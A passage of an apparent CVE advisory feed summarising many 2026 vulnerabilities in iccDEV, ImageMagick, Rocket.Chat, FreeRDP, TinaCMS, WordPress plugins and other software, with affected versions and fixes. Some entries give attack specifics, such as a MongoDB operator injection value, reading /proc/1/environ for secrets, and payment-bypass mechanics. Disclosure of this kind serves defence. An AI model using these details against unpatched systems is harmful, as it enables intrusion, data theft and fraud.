iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault due to invalid/wild pointer read in CIccCalculatorFunc::ApplySequence() causing denial of service. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31793

]]> https://www.tenable.com/cve/CVE-2026-31792 https://www.tenable.com/cve/CVE-2026-31792 Tue, 10 Mar 2026 18:18:59 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a null pointer dereference in CIccTagXmlStruct::ParseTag() causing a segmentation fault or denial of service. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-31792

]]> https://www.tenable.com/cve/CVE-2026-30987 https://www.tenable.com/cve/CVE-2026-30987 Tue, 10 Mar 2026 18:18:58 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in CIccTagNum<>::GetValues() causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30987

]]> https://www.tenable.com/cve/CVE-2026-30986 https://www.tenable.com/cve/CVE-2026-30986 Tue, 10 Mar 2026 18:18:57 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30986

]]> https://www.tenable.com/cve/CVE-2026-30985 https://www.tenable.com/cve/CVE-2026-30985 Tue, 10 Mar 2026 18:18:57 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30985

]]> https://www.tenable.com/cve/CVE-2026-30984 https://www.tenable.com/cve/CVE-2026-30984 Tue, 10 Mar 2026 18:18:57 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccCalculatorFunc::ApplySequence() causing an application crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30984

]]> https://www.tenable.com/cve/CVE-2026-30983 https://www.tenable.com/cve/CVE-2026-30983 Tue, 10 Mar 2026 18:18:57 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in icFixXml() (strcpy) causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30983

]]> https://www.tenable.com/cve/CVE-2026-30982 https://www.tenable.com/cve/CVE-2026-30982 Tue, 10 Mar 2026 18:18:57 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccPcsXform::pushXYZConvert() causing crash and potentially leaking memory contents. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30982

]]> https://www.tenable.com/cve/CVE-2026-30981 https://www.tenable.com/cve/CVE-2026-30981 Tue, 10 Mar 2026 18:18:57 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-buffer-overflow read in CIccXmlArrayType<>::DumpArray() causing out-of-bounds read and/or crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30981

]]> https://www.tenable.com/cve/CVE-2026-30980 https://www.tenable.com/cve/CVE-2026-30980 Tue, 10 Mar 2026 18:18:56 GMT Medium Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack overflow in CIccBasicStructFactory::CreateStruct() causing uncontrolled recursion/stack exhaustion and crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30980

]]> https://www.tenable.com/cve/CVE-2026-30979 https://www.tenable.com/cve/CVE-2026-30979 Tue, 10 Mar 2026 18:18:56 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in CIccCalculatorFunc::InitSelectOp() triggered with local user interaction causing memory corruption/crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30979

]]> https://www.tenable.com/cve/CVE-2026-30978 https://www.tenable.com/cve/CVE-2026-30978 Tue, 10 Mar 2026 18:18:56 GMT High Severity

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-use-after-free in CIccCmm::AddXform() causing invalid vptr dereference and crash. This vulnerability is fixed in 2.3.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-30978

]]> https://www.tenable.com/cve/CVE-2026-30974 https://www.tenable.com/cve/CVE-2026-30974 Tue, 10 Mar 2026 18:18:56 GMT Medium Severity

Description

Copyparty is a portable file server. Prior to v1.20.11., the nohtml config option, intended to prevent execution of JavaScript in user-uploaded HTML files, did not apply to SVG images. A user with write-permission could upload an SVG containing embedded JavaScript, which would execute in the context of whichever user opens it. This has been fixed in v1.20.11.

Read more at https://www.tenable.com/cve/CVE-2026-30974

]]> https://www.tenable.com/cve/CVE-2026-30970 https://www.tenable.com/cve/CVE-2026-30970 Tue, 10 Mar 2026 18:18:55 GMT High Severity

Description

Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, Coral Server allowed the creation of agent sessions through the /api/v1/sessions endpoint without strong authentication. This endpoint performs resource-intensive initialization operations including container spawning and memory context creation. An attacker capable of accessing the endpoint could create sessions or consume system resources without proper authorization. This vulnerability is fixed in 1.1.0.

Read more at https://www.tenable.com/cve/CVE-2026-30970

]]> https://www.tenable.com/cve/CVE-2026-30969 https://www.tenable.com/cve/CVE-2026-30969 Tue, 10 Mar 2026 18:18:55 GMT High Severity

Description

Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, Coral Server did not enforce strong authentication between agents and the server within an active session. This could allow an attacker who obtained or predicted a session identifier to impersonate an agent or join an existing session. This vulnerability is fixed in 1.1.0.

Read more at https://www.tenable.com/cve/CVE-2026-30969

]]> https://www.tenable.com/cve/CVE-2026-30968 https://www.tenable.com/cve/CVE-2026-30968 Tue, 10 Mar 2026 18:18:55 GMT High Severity

Description

Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, the SSE endpoint (/sse/v1/...) in Coral Server did not strongly validate that a connecting agent was a legitimate participant in the session. This could theoretically allow unauthorized message injection or observation. This vulnerability is fixed in 1.1.0.

Read more at https://www.tenable.com/cve/CVE-2026-30968

]]> https://www.tenable.com/cve/CVE-2026-30961 https://www.tenable.com/cve/CVE-2026-30961 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, the chunked upload completion path for file requests does not validate the total file size against the per-request MaxSize limit. An attacker with a public file request link can split an oversized file into chunks each under MaxSize and upload them sequentially, bypassing the size restriction entirely. Files up to the server's global MaxFileSizeMB are accepted regardless of the file request's configured limit. This vulnerability is fixed in 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-30961

]]> https://www.tenable.com/cve/CVE-2026-30955 https://www.tenable.com/cve/CVE-2026-30955 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An API endpoint accepts unbounded request bodies without any size limit. An authenticated user can cause an OOM kill and complete service disruption for all users. This vulnerability is fixed in 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-30955

]]> https://www.tenable.com/cve/CVE-2026-30943 https://www.tenable.com/cve/CVE-2026-30943 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-30943

]]> https://www.tenable.com/cve/CVE-2026-30931 https://www.tenable.com/cve/CVE-2026-30931 Tue, 10 Mar 2026 07:44:57 GMT High Severity

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-16, a heap-based buffer overflow in the UHDR encoder can happen due to truncation of a value and it would allow an out of bounds write. This vulnerability is fixed in 7.1.2-16.

Read more at https://www.tenable.com/cve/CVE-2026-30931

]]> https://www.tenable.com/cve/CVE-2026-30929 https://www.tenable.com/cve/CVE-2026-30929 Tue, 10 Mar 2026 07:44:57 GMT High Severity

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-16 and 6.9.13-41, MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack. This vulnerability is fixed in 7.1.2-16 and 6.9.13-41.

Read more at https://www.tenable.com/cve/CVE-2026-30929

]]> https://www.tenable.com/cve/CVE-2026-30927 https://www.tenable.com/cve/CVE-2026-30927 Tue, 10 Mar 2026 17:40:16 GMT Medium Severity

Description

Admidio is an open-source user management solution. Prior to 5.0.6, in modules/events/events_function.php, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the user_uuid GET parameter. The condition uses || (OR), meaning if possibleToParticipate() returns true (event is open for participation), ANY user - not just leaders - can specify a different user_uuid and register/cancel participation for that user. The code then operates on $user->getValue('usr_id') (the target user from user_uuid) rather than the current user. This vulnerability is fixed in 5.0.6.

Read more at https://www.tenable.com/cve/CVE-2026-30927

]]> https://www.tenable.com/cve/CVE-2026-30926 https://www.tenable.com/cve/CVE-2026-30926 Tue, 10 Mar 2026 07:44:56 GMT High Severity

Description

SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.

Read more at https://www.tenable.com/cve/CVE-2026-30926

]]> https://www.tenable.com/cve/CVE-2026-30919 https://www.tenable.com/cve/CVE-2026-30919 Tue, 10 Mar 2026 17:40:15 GMT Medium Severity

Description

facileManager is a modular suite of web apps built with the sysadmin in mind. Prior to 6.0.4 , stored XSS (also known as persistent or second-order XSS) occurs when an application receives data from an untrusted source and includes that data in its subsequent HTTP responses in an unsafe manner. This vulnerability was found in the fmDNS module. This vulnerability is fixed in 6.0.4.

Read more at https://www.tenable.com/cve/CVE-2026-30919

]]> https://www.tenable.com/cve/CVE-2026-30918 https://www.tenable.com/cve/CVE-2026-30918 Tue, 10 Mar 2026 17:40:15 GMT Medium Severity

Description

facileManager is a modular suite of web apps built with the sysadmin in mind. Prior to 6.0.4 , a reflected XSS occurs when an application receives data from an untrusted source and uses it in its HTTP responses in a way that could lead to vulnerabilities. It is possible to inject malicious JavaScript code into a URL by adding a script in a parameter. This vulnerability was found in the fmDNS module. The parameter that is vulnerable to an XSS attack is log_search_query. This vulnerability is fixed in 6.0.4.

Read more at https://www.tenable.com/cve/CVE-2026-30918

]]> https://www.tenable.com/cve/CVE-2026-30915 https://www.tenable.com/cve/CVE-2026-30915 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

SFTPGo is an open source, event-driven file transfer solution. SFTPGo versions before v2.7.1 contain an input validation issue in the handling of dynamic group paths, for example, home directories or key prefixes. When a group is configured with a dynamic home directory or key prefix using placeholders like %username%, the value replacing the placeholder is not strictly sanitized against relative path components. Consequently, if a user is created with a specially crafted username the resulting path may resolve to a parent directory instead of the intended sub-directory. This issue is fixed in version v2.7.1

Read more at https://www.tenable.com/cve/CVE-2026-30915

]]> https://www.tenable.com/cve/CVE-2026-30914 https://www.tenable.com/cve/CVE-2026-30914 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

SFTPGo is an open source, event-driven file transfer solution. In SFTPGo versions prior to 2.7.1, a path normalization discrepancy between the protocol handlers and the internal Virtual Filesystem routing can lead to an authorization bypass. An authenticated attacker can craft specific file paths to bypass folder-level permissions or escape the boundaries of a configured Virtual Folder. This vulnerability is fixed in 2.7.1.

Read more at https://www.tenable.com/cve/CVE-2026-30914

]]> https://www.tenable.com/cve/CVE-2026-30885 https://www.tenable.com/cve/CVE-2026-30885 Tue, 10 Mar 2026 17:40:14 GMT Medium Severity

Description

WWBN AVideo is an open source video platform. Prior to 25.0, the /objects/playlistsFromUser.json.php endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform. This vulnerability is fixed in 25.0.

Read more at https://www.tenable.com/cve/CVE-2026-30885

]]> https://www.tenable.com/cve/CVE-2026-30883 https://www.tenable.com/cve/CVE-2026-30883 Tue, 10 Mar 2026 07:44:56 GMT High Severity

Description

ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-16 and 6.9.13-41, an extremely large image profile could result in a heap overflow when encoding a PNG image. This vulnerability is fixed in 7.1.2-16 and 6.9.13-41.

Read more at https://www.tenable.com/cve/CVE-2026-30883

]]> https://www.tenable.com/cve/CVE-2026-30869 https://www.tenable.com/cve/CVE-2026-30869 Tue, 10 Mar 2026 17:40:14 GMT Critical Severity

Description

SiYuan is a personal knowledge management system. Prior to 3.5.10, a path traversal vulnerability in the /export endpoint allows an attacker to read arbitrary files from the server filesystem. By exploiting double‑encoded traversal sequences, an attacker can access sensitive files such as conf/conf.json, which contains secrets including the API token, cookie signing key, and workspace access authentication code. Leaking these secrets may enable administrative access to the SiYuan kernel API, and in certain deployment scenarios could potentially be chained into remote code execution (RCE). This vulnerability is fixed in 3.5.10.

Read more at https://www.tenable.com/cve/CVE-2026-30869

]]> https://www.tenable.com/cve/CVE-2026-30862 https://www.tenable.com/cve/CVE-2026-30862 Tue, 10 Mar 2026 17:40:14 GMT Critical Severity

Description

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.96, a Critical Stored XSS vulnerability exists in the Table Widget (TableWidgetV2). The root cause is a lack of HTML sanitization in the React component rendering pipeline, allowing malicious attributes to be interpolated into the DOM. By leveraging the "Invite Users" feature, an attacker with a regular user account (user@gmail.com) can force a System Administrator to execute a high-privileged API call (/api/v1/admin/env), resulting in a Full Administrative Account Takeover. This vulnerability is fixed in 1.96.

Read more at https://www.tenable.com/cve/CVE-2026-30862

]]> https://www.tenable.com/cve/CVE-2026-30853 https://www.tenable.com/cve/CVE-2026-30853 Fri, 13 Mar 2026 19:54:35 GMT Medium Severity

Description

calibre is a cross-platform e-book manager for viewing, converting, editing, and cataloging e-books. Prior to 9.5.0, a path traversal vulnerability in the RocketBook (.rb) input plugin (src/calibre/ebooks/rb/reader.py) allows an attacker to write arbitrary files to any path writable by the calibre process when a user opens or converts a crafted .rb file. This is the same bug class fixed in CVE-2026-26065 for the PDB readers, but the fix was never applied to the RB reader. This vulnerability is fixed in 9.5.0.

Read more at https://www.tenable.com/cve/CVE-2026-30853

]]> https://www.tenable.com/cve/CVE-2026-30833 https://www.tenable.com/cve/CVE-2026-30833 Fri, 06 Mar 2026 18:16:22 GMT Medium Severity

Description

Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0, a NoSQL injection vulnerability exists in Rocket.Chat's account service used in the ddp-streamer micro service that allows unauthenticated attackers to manipulate MongoDB queries during authentication. The vulnerability is located in the username-based login flow where user-supplied input is directly embedded into a MongoDB query selector without validation. An attacker can inject MongoDB operator expressions (e.g., { $regex: '.*' }) in place of a username string, causing the database query to match unintended user records. This issue has been patched in versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-30833

]]> https://www.tenable.com/cve/CVE-2026-30831 https://www.tenable.com/cve/CVE-2026-30831 Fri, 06 Mar 2026 18:16:21 GMT Critical Severity

Description

Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0, authentication vulnerabilities exist in Rocket.Chat's enterprise DDP Streamer service. The Account.login method exposed through the DDP Streamer does not enforce Two-Factor Authentication (2FA) or validate user account status (deactivated users can still login), despite these checks being mandatory in the standard Meteor login flow. This issue has been patched in versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-30831

]]> https://www.tenable.com/cve/CVE-2026-3045 https://www.tenable.com/cve/CVE-2026-3045 Fri, 13 Mar 2026 19:55:10 GMT High Severity

Description

The Appointment Booking Calendar — Simply Schedule Appointments plugin for WordPress is vulnerable to unauthorized access of sensitive data in all versions up to and including 1.6.9.29. This is due to two compounding weaknesses: (1) a non-user-bound `public_nonce` is exposed to unauthenticated users through the public `/wp-json/ssa/v1/embed-inner` REST endpoint, and (2) the `get_item()` method in `SSA_Settings_Api` relies on `nonce_permissions_check()` for authorization (which accepts the public nonce) but does not call `remove_unauthorized_settings_for_current_user()` to filter restricted fields. This makes it possible for unauthenticated attackers to access admin-only plugin settings including the administrator email, phone number, internal access tokens, notification configurations, and developer settings via the `/wp-json/ssa/v1/settings/{section}` endpoint. The exposure of appointment tokens also allows an attacker to modify or cancel appointments.

Read more at https://www.tenable.com/cve/CVE-2026-3045

]]> https://www.tenable.com/cve/CVE-2026-30240 https://www.tenable.com/cve/CVE-2026-30240 Mon, 09 Mar 2026 21:16:18 GMT High Severity

Description

Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.31.5 and earlier, a path traversal vulnerability in the PWA (Progressive Web App) ZIP processing endpoint (POST /api/pwa/process-zip) allows an authenticated user with builder privileges to read arbitrary files from the server filesystem, including /proc/1/environ which contains all environment variables — JWT secrets, database credentials, encryption keys, and API tokens. The server reads attacker-specified files via unsanitized path.join() with user-controlled input from icons.json inside the uploaded ZIP, then uploads the file contents to the object store (MinIO/S3) where they can be retrieved through signed URLs. This results in complete platform compromise as all cryptographic secrets and service credentials are exfiltrated in a single request.

Read more at https://www.tenable.com/cve/CVE-2026-30240

]]> https://www.tenable.com/cve/CVE-2026-30239 https://www.tenable.com/cve/CVE-2026-30239 Wed, 11 Mar 2026 17:16:57 GMT High Severity

Description

OpenProject is an open-source, web-based project management software. Prior to 17.2.0, when budgets are deleted, the work packages that were assigned to this budget need to be moved to a different budget. This action was performed before the permission check on the delete action was executed. This allowed all users in the application to delete work package budget assignments. This vulnerability is fixed in 17.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-30239

]]> https://www.tenable.com/cve/CVE-2026-30236 https://www.tenable.com/cve/CVE-2026-30236 Wed, 11 Mar 2026 17:16:57 GMT Medium Severity

Description

OpenProject is an open-source, web-based project management software. Prior to 17.2.0, when editing a project budget and planning the labor cost, it was not checked that the user that was planned in the budget is actually a project member. This exposed the user's default rate (if one was set up) to users that should only see that information for project members. Also, the endpoint that handles the pre-calculation for the frontend to display a preview of the costs, while it was being entered, did not properly validate the membership of the user as well. This also allowed to calculate costs with the default rate of non-members. This vulnerability is fixed in 17.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-30236

]]> https://www.tenable.com/cve/CVE-2026-30235 https://www.tenable.com/cve/CVE-2026-30235 Wed, 11 Mar 2026 17:16:57 GMT Medium Severity

Description

OpenProject is an open-source, web-based project management software. Prior to 17.2.0, this vulnerability occurs due to improper validation of OpenProject’s Markdown rendering, specifically in the hyperlink handling. This allows an attacker to inject malicious hyperlink payloads that perform DOM clobbering. DOM clobbering can crash or blank the entire page by overwriting native DOM functions with HTML elements, causing critical JavaScript calls to throw runtime errors during application initialization and halt further execution. This vulnerability is fixed in 17.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-30235

]]> https://www.tenable.com/cve/CVE-2026-30140 https://www.tenable.com/cve/CVE-2026-30140 Mon, 09 Mar 2026 19:16:07 GMT High Severity

Description

An incorrect access control vulnerability exists in Tenda W15E V02.03.01.26_cn. An unauthenticated attacker can access the /cgi-bin/DownloadCfg/RouterCfm.jpg endpoint to download the configuration file containing plaintext administrator credentials, leading to sensitive information disclosure and potential remote administrative access.

Read more at https://www.tenable.com/cve/CVE-2026-30140

]]> https://www.tenable.com/cve/CVE-2026-29790 https://www.tenable.com/cve/CVE-2026-29790 Fri, 06 Mar 2026 21:16:15 GMT Low Severity

Description

dbt-common is the shared common utilities for dbt-core and adapter implementations use. Prior to versions 1.34.2 and 1.37.3, a path traversal vulnerability exists in dbt-common's safe_extract() function used when extracting tarball archives. The function uses os.path.commonprefix() to validate that extracted files remain within the intended destination directory. However, commonprefix() compares paths character-by-character rather than by path components, allowing a malicious tarball to write files to sibling directories with matching name prefixes. This issue has been patched in versions 1.34.2 and 1.37.3.

Read more at https://www.tenable.com/cve/CVE-2026-29790

]]> https://www.tenable.com/cve/CVE-2026-29789 https://www.tenable.com/cve/CVE-2026-29789 Fri, 06 Mar 2026 21:16:15 GMT High Severity

Description

Vito is a self-hosted web application that helps manage servers and deploy PHP applications into production servers. Prior to version 3.20.3, a missing authorization check in workflow site-creation actions allows an authenticated attacker with workflow write access in one project to create/manage sites on servers belonging to other projects by supplying a foreign server_id. This issue has been patched in version 3.20.3.

Read more at https://www.tenable.com/cve/CVE-2026-29789

]]> https://www.tenable.com/cve/CVE-2026-29776 https://www.tenable.com/cve/CVE-2026-29776 Fri, 13 Mar 2026 19:54:33 GMT Low Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, Integer Underflow in update_read_cache_bitmap_order Function of FreeRDP's Core Library This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-29776

]]> https://www.tenable.com/cve/CVE-2026-29775 https://www.tenable.com/cve/CVE-2026-29775 Fri, 13 Mar 2026 19:54:33 GMT Medium Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a client-side heap out-of-bounds read/write occurs in FreeRDP's bitmap cache subsystem due to an off-by-one boundary check in bitmap_cache_put. A malicious server can send a CACHE_BITMAP_ORDER (Rev1) with cacheId equal to maxCells, bypassing the guard and accessing cells[] one element past the allocated array. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-29775

]]> https://www.tenable.com/cve/CVE-2026-29774 https://www.tenable.com/cve/CVE-2026-29774 Fri, 13 Mar 2026 19:54:32 GMT Medium Severity

Description

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a client-side heap buffer overflow occurs in the FreeRDP client's AVC420/AVC444 YUV-to-RGB conversion path due to missing horizontal bounds validation of H.264 metablock regionRects coordinates. In yuv.c, the clamp() function (line 347) only validates top/bottom against the surface/YUV height, but never checks left/right against the surface width. When avc420_yuv_to_rgb (line 67) computes destination and source pointers using rect->left, it performs unchecked pointer arithmetic that can reach far beyond the allocated surface buffer. A malicious server sends a WIRE_TO_SURFACE_PDU_1 with AVC420 codec containing a regionRects entry where left greatly exceeds the surface width (e.g., left=60000 on a 128px surface). The H.264 bitstream decodes successfully, then yuv420_process_work_callback calls avc420_yuv_to_rgb which computes pDstPoint = pDstData + rect->top * nDstStep + rect->left * 4, writing 16-byte SSE vectors 1888+ bytes past the allocated heap region. This vulnerability is fixed in 3.24.0.

Read more at https://www.tenable.com/cve/CVE-2026-29774

]]> https://www.tenable.com/cve/CVE-2026-29110 https://www.tenable.com/cve/CVE-2026-29110 Fri, 06 Mar 2026 18:16:20 GMT Medium Severity

Description

Cryptomator encrypts data being stored on cloud infrastructure. Prior to version 1.19.0, in non-debug mode Cryptomator might leak cleartext paths into the log file. This can reveal meta information about the files stored inside a vault at a time, where the actual vault is closed. Not every cleartext path is logged. Only if a filesystem request fails for some reason (e.g. damaged encrypted file, not existing file), a log message is created. This issue has been patched in version 1.19.0.

Read more at https://www.tenable.com/cve/CVE-2026-29110

]]> https://www.tenable.com/cve/CVE-2026-29091 https://www.tenable.com/cve/CVE-2026-29091 Fri, 06 Mar 2026 18:16:20 GMT High Severity

Description

Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Prior to version 3.0.0, a remote code execution (RCE) flaw was discovered in the locutus project, specifically within the call_user_func_array function implementation. The vulnerability allows an attacker to inject arbitrary JavaScript code into the application's runtime environment. This issue stems from an insecure implementation of the call_user_func_array function (and its wrapper call_user_func), which fails to properly validate all components of a callback array before passing them to eval(). This issue has been patched in version 3.0.0.

Read more at https://www.tenable.com/cve/CVE-2026-29091

]]> https://www.tenable.com/cve/CVE-2026-29079 https://www.tenable.com/cve/CVE-2026-29079 Fri, 13 Mar 2026 19:54:32 GMT High Severity

Description

Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0.

Read more at https://www.tenable.com/cve/CVE-2026-29079

]]> https://www.tenable.com/cve/CVE-2026-29078 https://www.tenable.com/cve/CVE-2026-29078 Fri, 13 Mar 2026 19:54:32 GMT High Severity

Description

Lexbor is a web browser engine library. Prior to 2.7.0, the ISO‑2022‑JP encoder in Lexbor fails to reset the temporary size variable between iterations. The statement ctx->buffer_used -= size with a stale size = 3 causes an integer underflow that wraps to SIZE_MAX. Afterwards, memcpy is called with a negative length, leading to an out‑of‑bounds read from the stack and an out‑of‑bounds write to the heap. The source data is partially controllable via the contents of the DOM tree. This vulnerability is fixed in 2.7.0.

Read more at https://www.tenable.com/cve/CVE-2026-29078

]]> https://www.tenable.com/cve/CVE-2026-29066 https://www.tenable.com/cve/CVE-2026-29066 Thu, 12 Mar 2026 17:16:50 GMT Medium Severity

Description

Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI dev server configures Vite with server.fs.strict: false, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system. This vulnerability is fixed in 2.1.8.

Read more at https://www.tenable.com/cve/CVE-2026-29066

]]> https://www.tenable.com/cve/CVE-2026-2890 https://www.tenable.com/cve/CVE-2026-2890 Fri, 13 Mar 2026 19:54:34 GMT High Severity

Description

The Formidable Forms plugin for WordPress is vulnerable to a payment integrity bypass in all versions up to, and including, 6.28. This is due to the Stripe Link return handler (`handle_one_time_stripe_link_return_url`) marking payment records as complete based solely on the Stripe PaymentIntent status without comparing the intent's charged amount against the expected payment amount, and the `verify_intent()` function validating only client secret ownership without binding intents to specific forms or actions. This makes it possible for unauthenticated attackers to reuse a PaymentIntent from a completed low-value payment to mark a high-value payment as complete, effectively bypassing payment for goods or services.

Read more at https://www.tenable.com/cve/CVE-2026-2890

]]> https://www.tenable.com/cve/CVE-2026-2888 https://www.tenable.com/cve/CVE-2026-2888 Fri, 13 Mar 2026 19:54:34 GMT Medium Severity

Description

The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services.

Read more at https://www.tenable.com/cve/CVE-2026-2888

]]> https://www.tenable.com/cve/CVE-2026-28793 https://www.tenable.com/cve/CVE-2026-28793 Thu, 12 Mar 2026 17:16:50 GMT High Severity

Description

Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.

Read more at https://www.tenable.com/cve/CVE-2026-28793

]]> https://www.tenable.com/cve/CVE-2026-28792 https://www.tenable.com/cve/CVE-2026-28792 Thu, 12 Mar 2026 17:16:50 GMT Critical Severity

Description

Tina is a headless content management system. Prior to 2.1.8 , the TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running. This vulnerability is fixed in 2.1.8.

Read more at https://www.tenable.com/cve/CVE-2026-28792

]]> https://www.tenable.com/cve/CVE-2026-28791 https://www.tenable.com/cve/CVE-2026-28791 Thu, 12 Mar 2026 17:16:50 GMT High Severity

Description

